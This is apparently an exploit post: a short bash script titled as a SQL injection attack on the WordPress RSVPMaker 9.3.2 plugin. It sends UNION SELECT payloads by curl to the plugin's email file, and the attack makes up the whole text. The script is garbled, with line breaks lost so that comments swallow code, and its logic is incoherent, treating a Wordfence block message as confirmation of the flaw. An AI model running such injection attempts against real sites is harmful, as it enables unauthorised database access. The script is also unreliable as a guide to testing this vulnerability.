WordPress RSVPMaker 9.3.2 SQL Injection

#!/bin/bash# Set the URL of the website running the vulnerable pluginurl="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"# Set the number of columns in the querycolumns=5response=$(curl -s "$url")query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')payload="' UNION SELECT 1,2,3,4,5-- "# Test the query with different numbers of columnsfor i in $(seq 1 $columns)do  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"  if [ $? -eq 0 ]  then    echo "Vulnerability confirmed with $i columns"    break  fidone